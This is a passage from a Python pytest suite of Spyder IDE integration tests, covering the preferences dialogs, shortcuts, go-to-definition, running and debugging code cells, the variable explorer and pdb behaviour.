""" # Reset config CONF.set('completions', ('provider_configuration', 'lsp', 'values', 'pydocstyle'), False) CONF.set('completions', ('provider_configuration', 'lsp', 'values', 'pycodestyle'), False) # Open completion prefences and update options dlg, index, page = preferences_dialog_helper(qtbot, main_window, 'completions') # Get the correct tab pages inside the Completion preferences page tnames = [page.tabs.tabText(i).lower() for i in range(page.tabs.count())] tabs = [(page.tabs.widget(i).layout().itemAt(0).widget(), i) for i in range(page.tabs.count())] tabs = dict(zip(tnames, tabs)) tab_widgets = { 'code style and formatting': 'code_style_check', 'docstring style': 'docstring_style_check' } for tabname in tab_widgets: tab, idx = tabs[tabname] check_name = tab_widgets[tabname] check = getattr(tab, check_name) page.tabs.setCurrentIndex(idx) check.animateClick() qtbot.wait(500) dlg.ok_btn.animateClick() preferences = main_window.preferences container = preferences.get_container() qtbot.waitUntil(lambda: container.dialog is None, timeout=5000) # Check the menus are correctly updated count = 0 for menu_item in main_window.source_menu_actions: if menu_item and isinstance(menu_item, QAction): print(menu_item.text(), menu_item.isChecked()) if 'code style' in menu_item.text(): assert menu_item.isChecked() count += 1 elif 'docstring style' in menu_item.text(): assert menu_item.isChecked() count += 1 assert count == 2 # Reset config CONF.set('completions', ('provider_configuration', 'lsp', 'values', 'pydocstyle'), False) CONF.set('completions', ('provider_configuration', 'lsp', 'values', 'pycodestyle'), False) @pytest.mark.slow def test_preferences_change_font_regression(main_window, qtbot): """ Test for spyder-ide/spyder/#10284 regression. Changing font resulted in error. """ dlg, index, page = preferences_dialog_helper(qtbot, main_window, 'appearance') for fontbox in [page.plain_text_font.fontbox, page.rich_text_font.fontbox]: fontbox.setFocus() idx = fontbox.currentIndex() fontbox.setCurrentIndex(idx + 1) dlg.ok_btn.animateClick() preferences = main_window.preferences container = preferences.get_container() qtbot.waitUntil(lambda: container.dialog is None, timeout=5000) @pytest.mark.slow @pytest.mark.skipif( not sys.platform.startswith('linux'), reason="Changes of Shitf+Return shortcut cause an ambiguous shortcut") def test_preferences_empty_shortcut_regression(main_window, qtbot): """ Test for spyder-ide/spyder/#12992 regression. Overwriting shortcuts results in a shortcuts conflict. """ # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Setup shortcuts (set run cell and advance shortcut to run selection) base_run_cell_advance = CONF.get_shortcut( 'editor', 'run cell and advance') # Should be Shift+Return base_run_selection = CONF.get_shortcut( 'editor', 'run selection') # Should be F9 assert base_run_cell_advance == 'Shift+Return' assert base_run_selection == 'F9' CONF.set_shortcut( 'editor', 'run cell and advance', '') CONF.set_shortcut( 'editor', 'run selection', base_run_cell_advance) main_window.shortcuts.apply_shortcuts() # Check execution of shortcut # Create new file main_window.editor.new() code_editor = main_window.editor.get_focus_widget() code_editor.set_text(u'print(0)\nprint(ññ)') with qtbot.waitSignal(shell.executed): qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier) qtbot.waitUntil(lambda: u'print(0)' in shell._control.toPlainText()) assert u'ññ' not in shell._control.toPlainText() # Reset shortcuts CONF.set_shortcut( 'editor', 'run selection', 'F9') CONF.set_shortcut( 'editor', 'run cell and advance', 'Shift+Return') main_window.shortcuts.apply_shortcuts() qtbot.wait(500) # Wait for shortcut change to actually be applied # Check shortcut run cell and advance reset code_editor.setFocus() with qtbot.waitSignal(shell.executed): qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier) qtbot.waitUntil(lambda: 'runcell(0' in shell._control.toPlainText()) @pytest.mark.slow def test_preferences_shortcut_reset_regression(main_window, qtbot): """ Test for spyder-ide/spyder/#11132 regression. Resetting shortcut resulted in error. """ dlg, index, page = preferences_dialog_helper(qtbot, main_window, 'shortcuts') page.reset_to_default(force=True) dlg.ok_btn.animateClick() preferences = main_window.preferences container = preferences.get_container() qtbot.waitUntil(lambda: container.dialog is None, timeout=5000) @pytest.mark.slow @pytest.mark.order(1) def test_preferences_change_interpreter(qtbot, main_window): """Test that on main interpreter change signal is emitted.""" # Check original pyls configuration lsp = main_window.completions.get_provider('lsp') config = lsp.generate_python_config() jedi = config['configurations']['pylsp']['plugins']['jedi'] assert jedi['environment'] is None assert jedi['extra_paths'] == [] # Change main interpreter on preferences dlg, index, page = preferences_dialog_helper(qtbot, main_window, 'main_interpreter') page.cus_exec_radio.setChecked(True) page.cus_exec_combo.combobox.setCurrentText(sys.executable) with qtbot.waitSignal(main_window.sig_main_interpreter_changed, timeout=5000, raising=True): dlg.ok_btn.animateClick() # Check updated pyls configuration config = lsp.generate_python_config() jedi = config['configurations']['pylsp']['plugins']['jedi'] assert jedi['environment'] == sys.executable assert jedi['extra_paths'] == [] @pytest.mark.slow def test_preferences_last_page_is_loaded(qtbot, main_window): # Test that the last page is updated on re open dlg, index, page = preferences_dialog_helper(qtbot, main_window, 'main_interpreter') preferences = main_window.preferences container = preferences.get_container() qtbot.waitUntil(lambda: container.dialog is not None, timeout=5000) dlg.ok_btn.animateClick() qtbot.waitUntil(lambda: container.dialog is None, timeout=5000) main_window.show_preferences() qtbot.waitUntil(lambda: container.dialog is not None, timeout=5000) dlg = container.dialog assert dlg.get_current_index() == index dlg.ok_btn.animateClick() qtbot.waitUntil(lambda: container.dialog is None, timeout=5000) @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.use_introspection @pytest.mark.skipif(not sys.platform.startswith('linux'), reason="It times out too much on Windows and macOS") def test_go_to_definition(main_window, qtbot, capsys): """Test that go-to-definition works as expected.""" # --- Code that gives no definition code_no_def = dedent(""" from qtpy.QtCore import Qt Qt.FramelessWindowHint""") # Create new editor with code and wait until LSP is ready main_window.editor.new(text=code_no_def) code_editor = main_window.editor.get_focus_widget() with qtbot.waitSignal( code_editor.completions_response_signal, timeout=30000): code_editor.document_did_open() # Move cursor to the left one character to be next to # FramelessWindowHint code_editor.move_cursor(-1) with qtbot.waitSignal( code_editor.completions_response_signal): code_editor.go_to_definition_from_cursor() # Capture stderr and assert there are no errors sys_stream = capsys.readouterr() assert sys_stream.err == u'' # --- Code that gives definition code_def = "import qtpy.QtCore" # Create new editor with code and wait until LSP is ready main_window.editor.new(text=code_def) code_editor = main_window.editor.get_focus_widget() with qtbot.waitSignal( code_editor.completions_response_signal, timeout=30000): code_editor.document_did_open() # Move cursor to the left one character to be next to QtCore code_editor.move_cursor(-1) with qtbot.waitSignal( code_editor.completions_response_signal): code_editor.go_to_definition_from_cursor() def _get_filenames(): return [osp.basename(f) for f in main_window.editor.get_filenames()] qtbot.waitUntil(lambda: 'QtCore.py' in _get_filenames()) assert 'QtCore.py' in _get_filenames() @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(sys.platform == 'darwin' and not PY2, reason="It times out on macOS/PY3") def test_debug_unsaved_file(main_window, qtbot): """Test that we can debug an unsaved file.""" # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Main variables control = shell._control debug_action = main_window.debug_toolbar_actions[0] debug_button = main_window.debug_toolbar.widgetForAction(debug_action) # Clear all breakpoints main_window.editor.clear_all_breakpoints() # create new file main_window.editor.new() code_editor = main_window.editor.get_focus_widget() code_editor.set_text('print(0)\nprint(1)\nprint(2)') # Set breakpoint code_editor.debugger.toogle_breakpoint(line_number=2) qtbot.wait(500) # Start debugging qtbot.mouseClick(debug_button, Qt.LeftButton) # There is a breakpoint, so it should continue qtbot.waitUntil( lambda: '!continue' in shell._control.toPlainText()) qtbot.waitUntil( lambda: "1---> 2 print(1)" in control.toPlainText()) @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.parametrize( "debug", [True, False]) def test_runcell(main_window, qtbot, tmpdir, debug): """Test the runcell command.""" # Write code with a cell to a file code = u"result = 10; fname = __file__" p = tmpdir.join("cell-test.py") p.write(code) main_window.editor.load(to_text_string(p)) shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) if debug: function = 'debugcell' else: function = 'runcell' # Execute runcell with qtbot.waitSignal(shell.executed): shell.execute(function + u"(0, r'{}')".format(to_text_string(p))) if debug: # Reach the 'name' input shell.pdb_execute('!c') qtbot.wait(1000) # Verify that the `result` variable is defined assert shell.get_value('result') == 10 # Verify that the `fname` variable is `cell-test.py` assert "cell-test.py" in shell.get_value('fname') # Verify that the `__file__` variable is undefined try: shell.get_value('__file__') assert False except KeyError: pass @pytest.mark.slow @flaky(max_runs=3) def test_runcell_leading_indent(main_window, qtbot, tmpdir): """Test the runcell command with leading indent.""" # Write code with a cell to a file code = ("def a():\n return\nif __name__ == '__main__':\n" "# %%\n print(1233 + 1)\n") p = tmpdir.join("cell-test.py") p.write(code) main_window.editor.load(to_text_string(p)) shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Execute runcell with qtbot.waitSignal(shell.executed): shell.execute("runcell(1, r'{}')".format(to_text_string(p))) assert "1234" in shell._control.toPlainText() assert "This is not valid Python code" not in shell._control.toPlainText() @pytest.mark.slow @flaky(max_runs=3) def test_varexp_rename(main_window, qtbot, tmpdir): """ Test renaming a variable. Regression test for spyder-ide/spyder#10735 """ # ---- Setup ---- p = (tmpdir.mkdir(u"varexp_rename").join(u"script.py")) filepath = to_text_string(p) shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath) # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Load test file main_window.editor.load(filepath) # Move to the editor's first line code_editor = main_window.editor.get_focus_widget() code_editor.setFocus() qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier) # Get a reference to the namespace browser widget nsb = main_window.variableexplorer.current_widget() # ---- Run file ---- with qtbot.waitSignal(shell.executed): qtbot.keyClick(code_editor, Qt.Key_F5) # Wait until all objects have appeared in the variable explorer qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 4, timeout=EVAL_TIMEOUT) # Rename one element nsb.editor.setCurrentIndex(nsb.editor.model.index(1, 0)) nsb.editor.rename_item(new_name='arr2') # Wait until all objects have updated in the variable explorer def data(cm, i, j): return cm.data(cm.index(i, j)) qtbot.waitUntil(lambda: data(nsb.editor.model, 1, 0) == 'arr2', timeout=EVAL_TIMEOUT) assert data(nsb.editor.model, 0, 0) == 'a' assert data(nsb.editor.model, 1, 0) == 'arr2' assert data(nsb.editor.model, 2, 0) == 'li' assert data(nsb.editor.model, 3, 0) == 's' # ---- Run file again ---- with qtbot.waitSignal(shell.executed): qtbot.keyClick(code_editor, Qt.Key_F5) # Wait until all objects have appeared in the variable explorer qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 5, timeout=EVAL_TIMEOUT) assert data(nsb.editor.model, 0, 0) == 'a' assert data(nsb.editor.model, 1, 0) == 'arr' assert data(nsb.editor.model, 2, 0) == 'arr2' assert data(nsb.editor.model, 3, 0) == 'li' assert data(nsb.editor.model, 4, 0) == 's' @pytest.mark.slow @flaky(max_runs=3) def test_varexp_remove(main_window, qtbot, tmpdir): """ Test removing a variable. Regression test for spyder-ide/spyder#10709 """ # ---- Setup ---- p = (tmpdir.mkdir(u"varexp_remove").join(u"script.py")) filepath = to_text_string(p) shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath) # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Load test file main_window.editor.load(filepath) # Move to the editor's first line code_editor = main_window.editor.get_focus_widget() code_editor.setFocus() qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier) # Get a reference to the namespace browser widget nsb = main_window.variableexplorer.current_widget() # ---- Run file ---- with qtbot.waitSignal(shell.executed): qtbot.keyClick(code_editor, Qt.Key_F5) # Wait until all objects have appeared in the variable explorer qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 4, timeout=EVAL_TIMEOUT) # Remove one element nsb.editor.setCurrentIndex(nsb.editor.model.index(1, 0)) nsb.editor.remove_item(force=True) # Wait until all objects have appeared in the variable explorer qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 3, timeout=EVAL_TIMEOUT) def data(cm, i, j): assert cm.rowCount() == 3 return cm.data(cm.index(i, j)) assert data(nsb.editor.model, 0, 0) == 'a' assert data(nsb.editor.model, 1, 0) == 'li' assert data(nsb.editor.model, 2, 0) == 's' @pytest.mark.slow @flaky(max_runs=3) def test_varexp_refresh(main_window, qtbot): """ Test refreshing the variable explorer while the kernel is executing. """ # Create object shell = main_window.ipyconsole.get_current_shellwidget() control = main_window.ipyconsole.get_widget().get_focus_widget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) shell.execute("import time\n" "for i in range(10):\n" " print('i = {}'.format(i))\n" " time.sleep(.1)\n") qtbot.waitUntil(lambda: "i = 0" in control.toPlainText()) qtbot.wait(300) # Get value object nsb = main_window.variableexplorer.current_widget() # This is empty assert len(nsb.editor.source_model._data) == 0 nsb.refresh_table() qtbot.waitUntil(lambda: len(nsb.editor.source_model._data) == 1) assert 0 < int(nsb.editor.source_model._data['i']['view']) < 9 @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(sys.platform == 'darwin', reason="Fails on macOS") def test_runcell_edge_cases(main_window, qtbot, tmpdir): """ Test if runcell works with an unnamed cell at the top of the file and with an empty cell. """ # Write code with a cell to a file code = ('if True:\n' ' a = 1\n' '#%%') p = tmpdir.join("test.py") p.write(code) main_window.editor.load(to_text_string(p)) shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) code_editor = main_window.editor.get_focus_widget() # call runcell with qtbot.waitSignal(shell.executed): qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier) qtbot.wait(1000) assert 'runcell(0' in shell._control.toPlainText() assert 'cell is empty' not in shell._control.toPlainText() with qtbot.waitSignal(shell.executed): qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier) assert 'runcell(1' in shell._control.toPlainText() assert 'Error' not in shell._control.toPlainText() assert 'cell is empty' in shell._control.toPlainText() @pytest.mark.slow @flaky(max_runs=3) def test_runcell_pdb(main_window, qtbot): """Test the runcell command in pdb.""" # Write code with a cell to a file code = ("if 'abba' in dir():\n" " print('abba {}'.format(abba))\n" "else:\n" " def foo():\n" " abba = 27\n" " foo()\n") # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Main variables debug_action = main_window.debug_toolbar_actions[0] debug_button = main_window.debug_toolbar.widgetForAction(debug_action) # Clear all breakpoints main_window.editor.clear_all_breakpoints() # create new file main_window.editor.new() code_editor = main_window.editor.get_focus_widget() code_editor.set_text(code) # Start debugging with qtbot.waitSignal(shell.executed, timeout=10000): qtbot.mouseClick(debug_button, Qt.LeftButton) for key in ['!n', '!n', '!s', '!n', '!n']: with qtbot.waitSignal(shell.executed): qtbot.keyClicks(shell._control, key) qtbot.keyClick(shell._control, Qt.Key_Enter) assert shell.get_value('abba') == 27 code_editor.setFocus() # call runcell with qtbot.waitSignal(shell.executed): qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier) assert "runcell" in shell._control.toPlainText() # Make sure the local variables are detected assert "abba 27" in shell._control.toPlainText() @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.parametrize( "debug", [False, True]) def test_runcell_cache(main_window, qtbot, debug): """Test the runcell command cache.""" # Write code with a cell to a file code = ("import time\n" "time.sleep(.5)\n" "# %%\n" "print('Done')\n") # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # create new file main_window.editor.new() code_editor = main_window.editor.get_focus_widget() code_editor.set_text(code) if debug: # Start debugging with qtbot.waitSignal(shell.executed): shell.execute("%debug print()") # Run the two cells code_editor.setFocus() code_editor.move_cursor(0) qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier) qtbot.wait(100) qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier) qtbot.wait(500) qtbot.waitUntil(lambda: "Done" in shell._control.toPlainText()) @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(not sys.platform.startswith('linux'), reason="Works reliably on Linux") def test_path_manager_updates_clients(qtbot, main_window, tmpdir): """Check that on path manager updates, consoles correctly update.""" main_window.show_path_manager() dlg = main_window._path_manager test_folder = 'foo-spam-bar-123' folder = str(tmpdir.mkdir(test_folder)) dlg.add_path(folder) qtbot.waitUntil(lambda: dlg.button_ok.isEnabled(), timeout=EVAL_TIMEOUT) with qtbot.waitSignal(dlg.sig_path_changed, timeout=EVAL_TIMEOUT): dlg.button_ok.animateClick() cmd = 'import sys;print(sys.path)' # Check Spyder is updated main_window.console.execute_lines(cmd) syspath = main_window.console.get_sys_path() assert folder in syspath # Check clients are updated count = 0 for client in main_window.ipyconsole.get_clients(): shell = client.shellwidget if shell is not None: syspath = shell.execute(cmd) control = shell._control # `shell.executed` signal was not working so we use waitUntil qtbot.waitUntil(lambda: 'In [2]:' in control.toPlainText(), timeout=EVAL_TIMEOUT) assert test_folder in control.toPlainText() count += 1 assert count >= 1 @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(os.name == 'nt' or sys.platform == 'darwin', reason="It times out on macOS and Windows") def test_pdb_key_leak(main_window, qtbot, tmpdir): """ Check that pdb notify spyder doesn't call QApplication.processEvents(). If it does there might be keystoke leakage. see #10834 """ # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) control = shell._control # Write code to a file code1 = ("def a():\n" " 1/0") code2 = ("from tmp import a\n" "a()") folder = tmpdir.join('tmp_folder') test_file = folder.join('tmp.py') test_file.write(code1, ensure=True) test_file2 = folder.join('tmp2.py') test_file2.write(code2) # Run tmp2 and get an error with qtbot.waitSignal(shell.executed): shell.execute('runfile("' + str(test_file2).replace("\\", "/") + '", wdir="' + str(folder).replace("\\", "/") + '")') assert '1/0' in control.toPlainText() # Replace QApplication.processEvents to make sure it is not called super_processEvents = QApplication.processEvents def processEvents(): processEvents.called = True return super_processEvents() processEvents.called = False try: QApplication.processEvents = processEvents # Debug and open both files with qtbot.waitSignal(shell.executed): shell.execute('%debug') with qtbot.waitSignal(shell.executed): qtbot.keyClicks(control, '!u') qtbot.keyClick(control, Qt.Key_Enter) # Wait until both files are open qtbot.waitUntil( lambda: osp.normpath(str(test_file)) in [ osp.normpath(p) for p in main_window.editor.get_filenames()]) qtbot.waitUntil( lambda: str(test_file2) in [ osp.normpath(p) for p in main_window.editor.get_filenames()]) # Make sure the events are not processed. assert not processEvents.called finally: QApplication.processEvents = super_processEvents @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(sys.platform == 'darwin', reason="It times out on macOS") @pytest.mark.parametrize( "where", [True, False]) def test_pdb_step(main_window, qtbot, tmpdir, where): """ Check that pdb notify Spyder only moves when a new line is reached. """ # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) control = shell._control # Write code to a file code1 = ("def a():\n" " 1/0") code2 = ("from tmp import a\n" "a()") folder = tmpdir.join('tmp_folder') test_file = folder.join('tmp.py') test_file.write(code1, ensure=True) test_file2 = folder.join('tmp2.py') test_file2.write(code2) # Run tmp2 and get an error with qtbot.waitSignal(shell.executed): shell.execute('runfile("' + str(test_file2).replace("\\", "/") + '", wdir="' + str(folder).replace("\\", "/") + '")') qtbot.wait(1000) assert '1/0' in control.toPlainText() # Debug and enter first file with qtbot.waitSignal(shell.executed): shell.execute('%debug') qtbot.waitUntil( lambda: osp.samefile( main_window.editor.get_current_editor().filename, str(test_file))) # Move to another file main_window.editor.new() qtbot.wait(100) assert main_window.editor.get_current_editor().filename != str(test_file) current_filename = main_window.editor.get_current_editor().filename # Run a random command, make sure we don't move with qtbot.waitSignal(shell.executed): qtbot.keyClicks(control, '!a') qtbot.keyClick(control, Qt.Key_Enter) qtbot.wait(1000) assert current_filename == main_window.editor.get_current_editor().filename # Go up and enter second file with qtbot.waitSignal(shell.executed): qtbot.keyClicks(control, '!u') qtbot.keyClick(control, Qt.Key_Enter) qtbot.waitUntil( lambda: osp.samefile( main_window.editor.get_current_editor().filename, str(test_file2))) # Go back to first file editor_stack = main_window.editor.get_current_editorstack() index = editor_stack.has_filename(str(test_file)) assert index is not None editor_stack.set_stack_index(index) assert osp.samefile( main_window.editor.get_current_editor().filename, str(test_file)) if where: # go back to the second file with where with qtbot.waitSignal(shell.executed): qtbot.keyClicks(control, '!w') qtbot.keyClick(control, Qt.Key_Enter) qtbot.wait(1000) # Make sure we moved assert osp.samefile( main_window.editor.get_current_editor().filename, str(test_file2)) else: # Stay at the same place with qtbot.waitSignal(shell.executed): qtbot.keyClicks(control, '!a') qtbot.keyClick(control, Qt.Key_Enter) qtbot.wait(1000) # Make sure we didn't move assert osp.samefile( main_window.editor.get_current_editor().filename, str(test_file)) @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(sys.platform == 'darwin', reason="Fails sometimes on macOS") def test_runcell_after_restart(main_window, qtbot): """Test runcell after a kernel restart.""" # Write code to a file code = "print('test_runcell_after_restart')" # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # create new file main_window.editor.new() code_editor = main_window.editor.get_focus_widget() code_editor.set_text(code) # Restart Kernel with qtbot.waitSignal(shell.sig_prompt_ready, timeout=10000): shell.ipyclient.restart_kernel() # call runcell code_editor.setFocus() qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier) qtbot.waitUntil( lambda: "test_runcell_after_restart" in shell._control.toPlainText()) # Make sure no errors are shown assert "error" not in shell._control.toPlainText().lower() @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(sys.platform.startswith('linux'), reason="It fails sometimes on Linux") @pytest.mark.parametrize( "ipython", [True, False]) @pytest.mark.parametrize( "test_cell_magic", [True, False]) def test_ipython_magic(main_window, qtbot, tmpdir, ipython, test_cell_magic): """Test the runcell command with cell magic.""" # Write code with a cell to a file write_file = tmpdir.mkdir("foo").join("bar.txt") assert not osp.exists(to_text_string(write_file)) if test_cell_magic: code = "\n\n%%writefile " + to_text_string(write_file) + "\ntest\n" else: code = "\n\n%debug print()" if ipython: fn = "cell-test.ipy" else: fn = "cell-test.py" p = tmpdir.join(fn) p.write(code) main_window.editor.load(to_text_string(p)) shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Execute runcell with qtbot.waitSignal(shell.executed): shell.execute("runcell(0, r'{}')".format(to_text_string(p))) control = main_window.ipyconsole.get_widget().get_focus_widget() error_text = 'save this file with the .ipy extension' try: if ipython: if test_cell_magic: qtbot.waitUntil( lambda: 'Writing' in control.toPlainText()) # Verify that the code was executed assert osp.exists(to_text_string(write_file)) else: qtbot.waitSignal(shell.executed) assert error_text not in control.toPlainText() else: qtbot.waitUntil(lambda: error_text in control.toPlainText()) finally: if osp.exists(to_text_string(write_file)): os.remove(to_text_string(write_file)) @pytest.mark.slow @flaky(max_runs=3) def test_running_namespace(main_window, qtbot, tmpdir): """ Test that the running namespace is correctly sent when debugging in a new namespace. """ code = ("def test(a):\n print('a:',a)\na = 10\ntest(5)") # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Main variables debug_action = main_window.debug_toolbar_actions[0] debug_button = main_window.debug_toolbar.widgetForAction(debug_action) # Clear all breakpoints main_window.editor.clear_all_breakpoints() # create new file main_window.editor.new() code_editor = main_window.editor.get_focus_widget() code_editor.set_text(code) code_editor.debugger.toogle_breakpoint(line_number=2) # Write b in the namespace with qtbot.waitSignal(shell.executed): shell.execute('b = 10') nsb = main_window.variableexplorer.current_widget() qtbot.waitUntil(lambda: 'b' in nsb.editor.source_model._data) assert nsb.editor.source_model._data['b']['view'] == '10' # Start debugging with qtbot.waitSignal(shell.executed): qtbot.mouseClick(debug_button, Qt.LeftButton) # b should not be there (running namespace) and the local a should be 5 qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data and nsb.editor.source_model._data['a']['view'] == '5', timeout=3000) assert 'b' not in nsb.editor.source_model._data assert nsb.editor.source_model._data['a']['view'] == '5' qtbot.waitUntil(shell.is_waiting_pdb_input) with qtbot.waitSignal(shell.executed): shell.pdb_execute('!c') # At the end, b should be back and a should be 10 qtbot.waitUntil(lambda: 'b' in nsb.editor.source_model._data) assert nsb.editor.source_model._data['a']['view'] == '10' assert nsb.editor.source_model._data['b']['view'] == '10' @pytest.mark.slow @flaky(max_runs=3) def test_post_mortem(main_window, qtbot, tmpdir): """Test post mortem works""" # Check we can use custom complete for pdb shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) control = main_window.ipyconsole.get_widget().get_focus_widget() test_file = tmpdir.join('test.py') test_file.write('raise RuntimeError\n') with qtbot.waitSignal(shell.executed): shell.execute( "runfile(" + repr(str(test_file)) + ", post_mortem=True)") assert "IPdb [" in control.toPlainText() @pytest.mark.slow @flaky(max_runs=3) def test_run_unsaved_file_multiprocessing(main_window, qtbot): """Test that we can run an unsaved file with multiprocessing.""" # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Main variables run_action = main_window.run_toolbar_actions[0] run_button = main_window.run_toolbar.widgetForAction(run_action) # create new file main_window.editor.new() code_editor = main_window.editor.get_focus_widget() code_editor.set_text( "import multiprocessing\n" "import traceback\n" 'if __name__ is "__main__":\n' " p = multiprocessing.Process(target=traceback.print_exc)\n" " p.start()\n" " p.join()\n" ) # This code should run even on windows # Start running qtbot.mouseClick(run_button, Qt.LeftButton) # Because multiprocessing is behaving strangly on windows, only some # situations will work. This is one of these situations so it shouldn't # be broken. if os.name == 'nt': qtbot.waitUntil( lambda: "Warning: multiprocessing" in shell._control.toPlainText()) else: # There is no exception, so the exception is None qtbot.waitUntil( lambda: 'None' in shell._control.toPlainText()) @pytest.mark.slow @flaky(max_runs=3) def test_varexp_cleared_after_kernel_restart(main_window, qtbot): """ Test that the variable explorer is cleared after a kernel restart. """ shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Create a variable with qtbot.waitSignal(shell.executed): shell.execute('a = 10') # Assert the value is shown in the variable explorer nsb = main_window.variableexplorer.current_widget() qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data, timeout=3000) # Restart Kernel with qtbot.waitSignal(shell.sig_prompt_ready, timeout=10000): shell.ipyclient.restart_kernel() # Assert the value was removed qtbot.waitUntil(lambda: 'a' not in nsb.editor.source_model._data, timeout=3000) @pytest.mark.slow @flaky(max_runs=3) def test_varexp_cleared_after_reset(main_window, qtbot): """ Test that the variable explorer is cleared after triggering a reset in the IPython console and variable explorer panes. """ shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Create a variable with qtbot.waitSignal(shell.executed): shell.execute('a = 10') # Assert the value is shown in the variable explorer nsb = main_window.variableexplorer.current_widget() qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data, timeout=3000) # Trigger a reset in the variable explorer nsb.reset_namespace() # Assert the value was removed qtbot.waitUntil(lambda: 'a' not in nsb.editor.source_model._data, timeout=3000) # Create the variable again with qtbot.waitSignal(shell.executed): shell.execute('a = 10') # Assert the value is shown in the variable explorer nsb = main_window.variableexplorer.current_widget() qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data, timeout=3000) # Trigger a reset in the console shell.ipyclient.reset_namespace() # Assert the value was removed qtbot.waitUntil(lambda: 'a' not in nsb.editor.source_model._data, timeout=3000) @pytest.mark.slow @flaky(max_runs=3) def test_immediate_debug(main_window, qtbot): """ Check if we can enter debugging immediately """ shell = main_window.ipyconsole.get_current_shellwidget() with qtbot.waitSignal(shell.executed, timeout=SHELL_TIMEOUT): shell.execute("%debug print()") @pytest.mark.slow @flaky(max_runs=3) def test_local_namespace(main_window, qtbot, tmpdir): """ Test that the local namespace is not reset. This can happen if `frame.f_locals` is called on the current frame, as this has the side effect of discarding the pdb locals. """ code = (""" def hello(): test = 1 print('test ==', test) hello() """) # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Main variables debug_action = main_window.debug_toolbar_actions[0] debug_button = main_window.debug_toolbar.widgetForAction(debug_action) # Clear all breakpoints main_window.editor.clear_all_breakpoints() # create new file main_window.editor.new() code_editor = main_window.editor.get_focus_widget() code_editor.set_text(code) code_editor.debugger.toogle_breakpoint(line_number=4) nsb = main_window.variableexplorer.current_widget() # Start debugging with qtbot.waitSignal(shell.executed): qtbot.mouseClick(debug_button, Qt.LeftButton) # Check `test` has a value of 1 # Here we use "waitUntil" because `shell.executed` is 